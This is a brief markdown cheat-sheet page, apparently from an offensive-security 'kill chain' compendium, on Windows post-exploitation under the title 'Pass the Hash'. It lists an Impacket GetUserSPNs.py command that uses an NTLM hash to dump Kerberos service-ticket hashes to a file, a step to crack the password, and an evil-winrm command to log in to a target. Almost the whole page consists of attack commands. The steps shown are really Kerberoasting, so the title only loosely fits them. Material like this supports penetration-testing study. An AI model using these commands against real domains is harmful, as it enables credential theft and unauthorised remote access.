killchain-compendium/post exploitation/docs/windows/pass_the_hash.md

195 B

Pass the Hash

Usage

GetUserSPNs.py <Domain>/<user> -hashes <ntlm:hash> -outputfile hash.txt
  • Crack the password
  • login
evilwinrm -i $TARGET_IP -u <user> -p password